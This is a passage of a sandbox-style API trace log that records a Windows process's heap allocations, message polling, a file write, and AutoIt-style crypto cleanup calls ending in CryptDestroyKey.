| out: hHeap=0x970000) returned 1 [0145.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0145.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0145.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0145.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0145.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f1e390 | out: hHeap=0x970000) returned 1 [0145.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0145.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0145.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa378) returned 0x2e80330 [0145.114] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e8a6b0 | out: hHeap=0x970000) returned 1 [0145.114] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0145.115] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0145.115] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0145.115] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0145.115] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0145.115] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0145.115] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0145.115] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0145.115] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0145.115] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0145.115] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0145.115] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0145.115] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0145.115] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0145.115] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0145.115] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa378) returned 0x2e8a6b0 [0145.116] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0145.116] WriteFile (in: hFile=0x2d0, lpBuffer=0x2e8a6b0*, nNumberOfBytesToWrite=0xa378, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2e8a6b0*, lpNumberOfBytesWritten=0x8cf5e4*=0xa378, lpOverlapped=0x0) returned 1 [0145.119] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0145.119] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e8a6b0 | out: hHeap=0x970000) returned 1 [0145.119] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0145.119] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0145.120] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0145.120] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0145.120] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0145.120] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0145.120] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0145.120] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0145.120] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0145.120] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0145.120] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0145.120] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0145.120] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0145.120] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0145.120] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0145.120] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0145.120] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0145.120] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504a0 [0145.120] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0145.120] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50650 [0145.120] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50698 [0145.120] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0145.120] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50590 [0145.120] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0145.120] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0145.120] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504d0 [0145.121] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0145.121] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0145.121] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0145.121] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0145.121] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0145.121] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0145.121] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d78 [0145.121] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0145.121] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0145.121] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0145.121] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0145.122] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50740 [0145.122] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0145.122] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0145.122] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0145.122] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0145.122] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0145.122] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0145.122] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0145.122] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0145.122] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0145.123] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0145.123] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0145.123] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0145.123] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0145.123] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0145.123] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0145.123] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0145.123] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0145.123] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0145.123] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0145.123] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0145.123] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0145.123] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0145.123] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0145.123] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff80 [0145.123] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0145.123] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0145.123] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff80 | out: hHeap=0x970000) returned 1 [0145.123] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0145.123] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506c8 [0145.123] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0145.123] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0145.123] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0145.124] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0145.124] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0145.124] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0145.124] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0145.124] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0145.124] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0145.124] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0145.124] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0145.124] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0145.124] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0145.124] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0145.124] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0145.124] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0145.124] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0145.124] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0145.124] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0145.124] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0145.124] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0145.124] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0145.124] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0145.124] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0145.124] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0145.124] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0145.124] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0145.124] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0145.125] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0145.125] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0145.125] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0145.125] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0145.125] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0145.125] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0145.125] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0145.125] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0145.125] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0145.125] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0145.125] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0145.125] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0145.125] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0145.125] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0145.125] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0145.125] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0145.125] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0145.125] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0145.125] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0145.125] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0145.125] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0145.125] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0145.126] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0145.126] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e508d8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0145.126] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0145.126] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0145.126] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0145.126] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0145.126] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0145.126] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0145.126] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0145.126] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0145.126] CryptDestroyKey (hKey=0xa87410) returned 1 [0145.126] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0145.126] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0145.127] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0145.127] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0145.127] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0145.127] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0145.127] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0145.127] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0145.127] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0145.127] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0145.127] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0145.127] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0145.127] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0145.127] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0145.127] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0145.127] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0145.127] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0145.127] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0145.127] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0145.127] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0145.127] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0145.127] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0145.127] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0145.127] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0145.127] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0145.128] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0145.128] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0145.128] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0145.128] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0145.128] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0145.128] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0145.128] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0145.128] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0145.128] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0145.128] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0145.128] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0145.128] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0145.128] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0145.128] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0145.128] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0145.128] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0145.128] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0145.128] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0145.128] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0145.128] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0145.128] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0145.128] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0145.128] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0145.128] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0145.128] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0145.129] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0145.129] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0145.129] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0145.129] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0145.129] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0145.129] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0145.129] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0145.129] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0145.129] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0145.129] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0145.129] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0145.129] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0145.129] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0145.129] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50938 [0145.129] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0145.129] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0145.129] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fed8 [0145.129] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0145.129] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0145.129] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fed8 | out: hHeap=0x970000) returned 1 [0145.129] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0145.129] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506e0 [0145.129] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0145.130] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0145.130] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0145.130] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0145.130] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0145.130] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0145.130] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0145.130] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0145.130] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0145.130] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 